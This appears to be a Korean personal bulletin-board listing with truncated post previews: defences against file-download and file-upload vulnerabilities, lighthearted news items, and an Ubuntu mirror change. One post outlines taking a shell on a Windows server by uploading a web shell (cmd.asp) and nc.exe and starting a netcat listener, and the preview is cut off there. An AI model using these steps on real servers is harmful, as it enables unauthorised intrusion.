| | 파일다운로드 취약점 보안 대책 - 절대경로(full path)
|
| 1. 서버의 다운로드 스크립트내에서 다운로드 가능한 디렉토리 목록을 설정한다.
2. 다운로드를 허용하기 전에 대상 파일의 절대경로(파일시스템 상의)를 생성한다.
3. 대상 파일이 허용 디렉토리 내부 파일이 아니면 거부한다.
JSP의 경우 절대경로는 getServletCo... |
| |
공개
| 댓글: 2 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
| | 윈도우 서버 쉘 따기: reverse telnet
|
| 1. 파일업로드 기능이 있는 웹쉘 업로드 (예를 들어 cmd.asp)
2. nc.exe 업로드
3. cmd.asp를 통해 nc.exe 경로확인 (dir /w /s \nc.exe)
- C:\InetPub\wwwroot\board\pds\nc.exe
4. 공격자: nc.exe -l ... |
| |
공개
| 댓글: 0 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
| | 파일업로드 취약점 방지 방법 2: 근본 대책
|
| 서버의 파일 업로드 스크립트 내에서 업로드 허용/불허 확장자 목록을 설정한다.
또는
업로드되는 파일의 이름과 확장자를 모두 없애고 새로운 이름으로 부여한다. |
| |
공개
| 댓글: 0 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
| 벌서는 아기들 ‘귀여워’
|
| 아기들이 벽을 보면서 혼자만의 시간을 갖고 있다. 명상하면 자신의 잘못을 돌아봐야 한다는 부모의 지시가 있었다. 사진을 공개한 미국인 네티즌들의 설명에 따르면, 아기들은 어떤 애니메이션을 볼지 결정하는 과정에서 심하게 다퉈 벌을 서고 있다고 한다.
사진은 소셜 미디어에서 인기다.... |
| |
공개
| 댓글: 0 | 첨부파일: 1 |
등록자: jinsuk |
등록일:
|
| |
| 주인 따라하는 고양이, '이 정도 쯤이야 쉽죠~'
|
| 주인 따라하는 고양이 게시물이 네티즌의 웃음을 자아내고 있다. / 온라인커뮤니티
[스포츠서울닷컴 ㅣ e뉴스팀] 주인 따라하는 고양이 게시물이 애완동물과 주인간 교감하는 모습으로 화제다.
최근 온라인 커뮤니티 게시판에 '주인 따라하는 고양이'라는 제목으로 고양이와 아이의 모습... |
| |
공개
| 댓글: 0 | 첨부파일: 1 |
등록자: jinsuk |
등록일:
|
| |
| 피자 가게 망하게 할 사람들? '샐러드 쌓기의 달인' 눈길
|
| 일반적인 피자 가게의 '법칙'을 가볍게 무시하는 '달인'이 큰 인기를 끌고 있다. '피자 가게를 망하게 할 사람들'이라는 오명과 찬사를 동시에 받는 이들의 공통점은 하나의 접시에 샐러드를 엄청나게 쌓을 수 있는 기술을 가졌다는 점이다. 이들은 딱 한 번 샐러드를 담을 수 있는 피자 가게... |
| |
공개
| 댓글: 0 | 첨부파일: 1 |
등록자: jinsuk |
등록일:
|
| |
| | 우분투 한국미러(kr.archive.ubuntu.com) 변경하기.
|
| 요즘 우분투 한국미러인 카이스트 ftp가 너무 느리다. 100kb/s이하이며 대충 30~50kb/s...
다음 FTP로 바꾸는 방법
sudo vi /etc/apt/sources.list
:g/kr.archive.ubuntu.com/s//ftp.daum.net/g
:wq... |
| |
공개
| 댓글: 0 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
|
